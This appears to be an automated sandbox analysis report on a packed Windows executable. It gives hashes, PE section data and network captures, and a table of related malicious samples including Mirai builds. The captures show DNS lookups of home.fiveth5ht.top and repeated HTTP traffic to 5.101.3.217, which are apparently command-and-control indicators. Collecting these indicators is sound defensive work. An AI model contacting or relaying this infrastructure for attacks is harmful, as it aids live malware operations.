AMAZON-AESUS | jklg6EIhyR.exe | malicious | Unknown | 34.226.108.155
AMAZON-AESUS | qr2JeuLuOQ.exe | malicious | Unknown | 34.226.108.155
AMAZON-AESUS | E6rBvcWFWu.exe | malicious | Unknown | 3.218.7.103
AMAZON-AESUS | xd.mips.elf | malicious | Mirai | 34.206.168.77
AMAZON-AESUS | xd.x86.elf | malicious | Mirai | 44.213.56.197
AMAZON-AESUS | telnet.arm.elf | malicious | Unknown | 18.209.195.84
                            No context
                            No created / dropped files found
File type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit): 7.984724303692274
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• VXD Driver (31/22) 0.00%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: w6cYYyWXqJ.exe
File size: 4'519'424 bytes
MD5: 26e7c91d9fb68ef0ce54aabc0465a8b0
SHA1: a2b0aee031cbd7f67d4f86c45354a2715ca0c25c
SHA256: 23569c1720e9dd2b72da3ea832f2a0029c29c8d6b5f3e50caefed0dcbaa605ac
SHA512: 047adff7d51e812470213b18cb11b9f5ec22e4416f7d6ea9bdfdea39159ae752fcafd5dd94e143b69fbaa4196f2a81e4a7e82843acd9467bb3590eb1ae823edb
SSDEEP: 98304:1AIJjZfEYfN71TmUuOXQiItb+6B+s9K+MDYpHMtl7kl:OIJj1EdUuOAFtbfUs9K+T1Mtl7kl
TLSH: B426336A9B2891B8CD59ED3F29BC181F61F70F937197085D8CE450C5FDAAE6090B9F02
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._.lg...............(..I...p..2........... I...@...................................E...@... ............................
Icon Hash: 00928e8e8686b000
Entrypoint: 0x103e000
Entrypoint Section: .taggant
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics: DYNAMIC_BASE
Time Stamp: 0x676CDB5F [Thu Dec 26 04:28:15 2024 UTC]
TLS Callbacks: (none listed)
CLR (.Net) Version: (none)
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
Name                                 | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IMPORT         | 0x6dd05f        | 0x73         | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0x6dc000        | 0x1ac        | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_SECURITY       | 0x708a00        | 0x688        |
IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0xc3cda8        | 0x10         | bzvzmdre
IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_TLS            | 0xc3cd58        | 0x18         | bzvzmdre
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IAT            | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          |
Name     | Virtual Address | Virtual Size | Raw Size | MD5                              | Xored PE | ZLIB Complexity     | File Type            | Entropy            | Characteristics
(none)   | 0x1000          | 0x6db000     | 0x288a00 | 0fa1ec959be5f467e148932c5dc46349 | unknown  | unknown             | unknown              | unknown            | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc    | 0x6dc000        | 0x1ac        | 0x200    | e9c8584261bcb0b066ee4220e56c1ab1 | False    | 0.580078125         | data                 | 4.554503423022307  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata   | 0x6dd000        | 0x1000       | 0x200    | 6363462e4ea156e03144265f6be7871e | False    | 0.166015625         | data                 | 1.1763897754724144 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(none)   | 0x6de000        | 0x39c000     | 0x200    | 11a131118bf79d03158cadb5d3c2376b | unknown  | unknown             | unknown              | unknown            | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
bzvzmdre | 0xa7a000        | 0x1c3000     | 0x1c3000 | 17955d93ac0435bc8b6bf91fcdc1c97e | False    | 0.9944616347353105  | data                 | 7.954619105553536  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
syyxadwf | 0xc3d000        | 0x1000       | 0x400    | 1bf00288faf77bdbf648945d5853a509 | False    | 0.80859375          | data                 | 6.228516142649406  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0xc3e000        | 0x3000       | 0x2200   | 173480eae4705afc74c8065102569ad0 | False    | 0.06904871323529412 | DOS executable (COM) | 0.8034534274867503 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name        | RVA      | Size  | Type                                   | Language | Country | ZLIB Complexity
RT_MANIFEST | 0xc3cdb8 | 0x152 | ASCII text, with CRLF line terminators |          |         | 0.6479289940828402

DLL          | Import
kernel32.dll | lstrcpy
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                Dec 27, 2024 08:38:17.895176888 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:17.895183086 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:17.895211935 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:17.895242929 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:17.895301104 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:17.895384073 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:17.895392895 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:17.895402908 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:17.895492077 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:17.895498037 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:17.895584106 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:17.895593882 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:17.895627975 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:17.895661116 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:17.895773888 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:17.895788908 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:17.895822048 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:17.895839930 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:17.895958900 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:17.895967960 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:17.896230936 CET4970280192.168.2.75.101.3.217
                                Dec 27, 2024 08:38:17.896305084 CET4970280192.168.2.75.101.3.217
                                Dec 27, 2024 08:38:18.013115883 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.013132095 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.013135910 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.013144970 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.013247013 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.013257027 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.013561964 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.013571978 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.013580084 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.013588905 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.013698101 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.013712883 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.013720989 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.014168024 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.014305115 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.014314890 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.014322042 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.014331102 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.014451981 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.014847040 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.014856100 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.014863968 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.014873028 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.014879942 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.014892101 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.014899969 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.015503883 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.015513897 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.015521049 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.015649080 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.015659094 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.015666008 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.015675068 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.016127110 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.016135931 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.016143084 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.016275883 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.016284943 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.016293049 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.016746044 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.016925097 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.016933918 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.017081976 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.017091036 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.017100096 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.017107964 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.017395973 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.017405987 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.017419100 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.017551899 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.017560959 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.017569065 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.017631054 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.017641068 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.017982960 CET4970280192.168.2.75.101.3.217
                                Dec 27, 2024 08:38:18.018053055 CET4970280192.168.2.75.101.3.217
                                Dec 27, 2024 08:38:18.018136978 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.018271923 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.018281937 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.018290043 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.018299103 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.018309116 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.018621922 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.018774033 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.018783092 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.018913031 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.018922091 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.018929005 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.018939018 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.019243956 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.019253016 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.019260883 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.019268990 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.019397020 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.019406080 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.019865990 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.020025969 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.020035982 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.020044088 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.020167112 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.020176888 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.020185947 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.020467997 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.020477057 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.020484924 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.020494938 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.020504951 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.020550013 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.020567894 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.021163940 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.021173000 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.021182060 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.021295071 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.021305084 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.021312952 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.021322012 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.021753073 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.021910906 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.021919966 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.022063017 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.022072077 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.022079945 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.022384882 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.022517920 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.022527933 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.022537947 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.022655964 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.022665977 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.022815943 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.022825003 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.023011923 CET4970280192.168.2.75.101.3.217
                                Dec 27, 2024 08:38:18.138017893 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.138050079 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.138062000 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.138108015 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.138227940 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.138237000 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.138247967 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.138267994 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.138341904 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.138382912 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.138425112 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.138447046 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.138484955 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.138521910 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.138570070 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.138585091 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.138685942 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.138695002 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.138763905 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.138772964 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.138842106 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.138858080 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.138906956 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.138958931 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.139004946 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.139097929 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.139106989 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.139139891 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.139200926 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.139209986 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.139355898 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.139471054 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.139481068 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.139489889 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.139545918 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.139555931 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.139590979 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.139600992 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.139641047 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.139683962 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.139739990 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.139749050 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.139843941 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.139853954 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.139949083 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.139957905 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.139998913 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.140007973 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.140105963 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.140115976 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.140196085 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.140204906 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.140311956 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.140336990 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.143105030 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.143168926 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.143248081 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.143259048 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.143270016 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.143304110 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.143351078 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.143393040 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.143469095 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.143485069 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.143521070 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.143531084 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.143590927 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.143601894 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.143687963 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.143699884 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.143738985 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.143749952 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.143852949 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.143862009 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.143965960 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.143982887 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.144002914 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.144030094 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.144079924 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.144104004 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.144187927 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.144228935 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.144273043 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.144355059 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:18.144365072 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:21.098387003 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:21.098402977 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:21.098766088 CET4970280192.168.2.75.101.3.217
                                Dec 27, 2024 08:38:21.098884106 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:21.099026918 CET4970280192.168.2.75.101.3.217
                                Dec 27, 2024 08:38:21.099066973 CET4970280192.168.2.75.101.3.217
                                Dec 27, 2024 08:38:21.218765020 CET80497025.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:21.299475908 CET4971380192.168.2.75.101.3.217
                                Dec 27, 2024 08:38:21.418920040 CET80497135.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:21.419015884 CET4971380192.168.2.75.101.3.217
                                Dec 27, 2024 08:38:21.419481039 CET4971380192.168.2.75.101.3.217
                                Dec 27, 2024 08:38:21.538942099 CET80497135.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:22.896377087 CET80497135.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:22.896532059 CET80497135.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:22.896600962 CET4971380192.168.2.75.101.3.217
                                Dec 27, 2024 08:38:22.896904945 CET4971380192.168.2.75.101.3.217
                                Dec 27, 2024 08:38:23.017709970 CET80497135.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:23.107873917 CET4972180192.168.2.75.101.3.217
                                Dec 27, 2024 08:38:23.227502108 CET80497215.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:23.227576017 CET4972180192.168.2.75.101.3.217
                                Dec 27, 2024 08:38:23.228013039 CET4972180192.168.2.75.101.3.217
                                Dec 27, 2024 08:38:23.347445965 CET80497215.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:24.734215975 CET80497215.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:24.734316111 CET80497215.101.3.217192.168.2.7
                                Dec 27, 2024 08:38:24.734390020 CET4972180192.168.2.75.101.3.217
                                Dec 27, 2024 08:38:24.734678984 CET4972180192.168.2.75.101.3.217
                                Dec 27, 2024 08:38:24.854290962 CET80497215.101.3.217192.168.2.7
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Dec 27, 2024 08:38:10.292380095 CET | 59162 | 53 | 192.168.2.7 | 1.1.1.1 |
| Dec 27, 2024 08:38:10.292491913 CET | 59162 | 53 | 192.168.2.7 | 1.1.1.1 |
| Dec 27, 2024 08:38:10.429814100 CET | 53 | 59162 | 1.1.1.1 | 192.168.2.7 |
| Dec 27, 2024 08:38:10.430349112 CET | 53 | 59162 | 1.1.1.1 | 192.168.2.7 |
| Dec 27, 2024 08:38:15.503846884 CET | 53688 | 53 | 192.168.2.7 | 1.1.1.1 |
| Dec 27, 2024 08:38:15.503946066 CET | 53688 | 53 | 192.168.2.7 | 1.1.1.1 |
| Dec 27, 2024 08:38:16.353640079 CET | 53 | 53688 | 1.1.1.1 | 192.168.2.7 |
| Dec 27, 2024 08:38:16.353653908 CET | 53 | 53688 | 1.1.1.1 | 192.168.2.7 |
| Dec 27, 2024 08:38:21.160672903 CET | 53690 | 53 | 192.168.2.7 | 1.1.1.1 |
| Dec 27, 2024 08:38:21.160757065 CET | 53690 | 53 | 192.168.2.7 | 1.1.1.1 |
| Dec 27, 2024 08:38:21.298346996 CET | 53 | 53690 | 1.1.1.1 | 192.168.2.7 |
| Dec 27, 2024 08:38:21.298464060 CET | 53 | 53690 | 1.1.1.1 | 192.168.2.7 |
| Dec 27, 2024 08:38:22.968153954 CET | 58453 | 53 | 192.168.2.7 | 1.1.1.1 |
| Dec 27, 2024 08:38:22.968244076 CET | 58453 | 53 | 192.168.2.7 | 1.1.1.1 |
| Dec 27, 2024 08:38:23.106138945 CET | 53 | 58453 | 1.1.1.1 | 192.168.2.7 |
| Dec 27, 2024 08:38:23.106152058 CET | 53 | 58453 | 1.1.1.1 | 192.168.2.7 |
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Dec 27, 2024 08:38:10.292380095 CET | 192.168.2.7 | 1.1.1.1 | 0x4056 | Standard query (0) | httpbin.org | A (IP address) | IN (0x0001) | false |
| Dec 27, 2024 08:38:10.292491913 CET | 192.168.2.7 | 1.1.1.1 | 0x66ae | Standard query (0) | httpbin.org | 28 | IN (0x0001) | false |
| Dec 27, 2024 08:38:15.503846884 CET | 192.168.2.7 | 1.1.1.1 | 0x9e53 | Standard query (0) | home.fiveth5ht.top | A (IP address) | IN (0x0001) | false |
| Dec 27, 2024 08:38:15.503946066 CET | 192.168.2.7 | 1.1.1.1 | 0xbadf | Standard query (0) | home.fiveth5ht.top | 28 | IN (0x0001) | false |
| Dec 27, 2024 08:38:21.160672903 CET | 192.168.2.7 | 1.1.1.1 | 0x3529 | Standard query (0) | home.fiveth5ht.top | A (IP address) | IN (0x0001) | false |
| Dec 27, 2024 08:38:21.160757065 CET | 192.168.2.7 | 1.1.1.1 | 0x266c | Standard query (0) | home.fiveth5ht.top | 28 | IN (0x0001) | false |
| Dec 27, 2024 08:38:22.968153954 CET | 192.168.2.7 | 1.1.1.1 | 0x3088 | Standard query (0) | home.fiveth5ht.top | A (IP address) | IN (0x0001) | false |
| Dec 27, 2024 08:38:22.968244076 CET | 192.168.2.7 | 1.1.1.1 | 0xc7d7 | Standard query (0) | home.fiveth5ht.top | 28 | IN (0x0001) | false |
